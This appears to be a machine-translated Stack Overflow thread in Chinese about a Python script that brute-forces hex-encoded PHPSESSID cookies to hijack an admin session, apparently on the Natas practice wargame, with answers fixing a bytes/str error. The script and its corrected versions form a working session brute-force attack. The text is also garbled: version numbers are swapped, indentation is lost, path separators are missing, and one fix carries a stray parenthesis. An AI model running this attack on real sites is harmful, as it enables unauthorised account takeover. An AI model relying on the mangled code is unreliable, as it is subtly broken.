我试图通过发送随机cookie来暴力破解会话,直到正确的cookie给我一个管理会话。我在Windows 3.6上使用python 10。
我想使用的cookie是PHPSESSID,我已将其设置为由"#-admin"组成的十六进制编码字符串。该网站给出了一个随机的十六进制编码的PHPSESSID,但只有数字会发生变化(每次刷新后"-admin"都是一致的(。源代码将数字最大化为 640,因此范围。
代码如下:
for x in range(1,641):
if x % 10 == 0:
print (str(x) + ' Sessions Tested')
cookies = dict(PHPSESSID=(binascii.hexlify(str(x).encode('ascii')+b'-admin')))
r = requests.get(target, cookies=cookies)
if r.text.find(trueStr) != -1:
print ('Got it!')
在窗口上运行脚本后,我收到以下错误:
Traceback (most recent call last):
File "natas19.py", line 14, in <module>
r = requests.get(target, cookies=cookies)
File "C:Userse403saAppDataLocalProgramsPythonPython36-32libsite-packagesrequests-2.18.4-py3.6.eggrequestsapi.py", line 72, in get
return request('get', url, params=params, **kwargs)
File "C:Userse403saAppDataLocalProgramsPythonPython36-32libsite-packagesrequests-2.18.4-py3.6.eggrequestsapi.py", line 58, in request
return session.request(method=method, url=url, **kwargs)
File "C:Userse403saAppDataLocalProgramsPythonPython36-32libsite-packagesrequests-2.18.4-py3.6.eggrequestssessions.py", line 494, in request
prep = self.prepare_request(req)
File "C:Userse403saAppDataLocalProgramsPythonPython36-32libsite-packagesrequests-2.18.4-py3.6.eggrequestssessions.py", line 415, in prepare_request
cookies = cookiejar_from_dict(cookies)
File "C:Userse403saAppDataLocalProgramsPythonPython36-32libsite-packagesrequests-2.18.4-py3.6.eggrequestscookies.py", line 518, in cookiejar_from_dict
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
File "C:Userse403saAppDataLocalProgramsPythonPython36-32libsite-packagesrequests-2.18.4-py3.6.eggrequestscookies.py", line 345, in set_cookie
if hasattr(cookie.value, 'startswith') and cookie.value.startswith('"') and cookie.value.endswith('"'):
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
我不知道从哪里开始。我遵循了python请求的文档。任何关于哪里看的建议将不胜感激。
Cookie 值必须是str对象,但binascii.hexlify()返回一个bytes对象:
>>> import binascii
>>> x = 1
>>> binascii.hexlify(str(x).encode('ascii')+b'-admin')
b'312d61646d696e'
首先解码:
cookies = {
'PHPSESSID': binascii.hexlify(b'%d-admin' % x).decode('ascii')
}
在您的示例中,cookies 是由以下各项设置的dict:
dict(PHPSESSID=(binascii.hexlify(str(x).encode('ascii') + b'-admin')))
如果分解该单行代码的步骤,则会看到问题:
>>> binascii.hexlify(str(x).encode('ascii') + b'-admin')
b'312d61646d696e'
>>> b'312d61646d696e'.startswith('3')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
您正在使用str的第一个参数执行bytes操作。由于它是管理 cookie 的requests包,因此请在设置PHPSESSID之前将值转换为str。
for x in range(1,641):
if x % 10 == 0:
print (str(x) + ' Sessions Tested')
b_sess_id = binascii.hexlify(str(x).encode('ascii')+b'-admin'))
cookies = dict(PHPSESSID=b_sess_id.decode())
r = requests.get(target, cookies=cookies)
if r.text.find(trueStr) != -1:
print ('Got it!')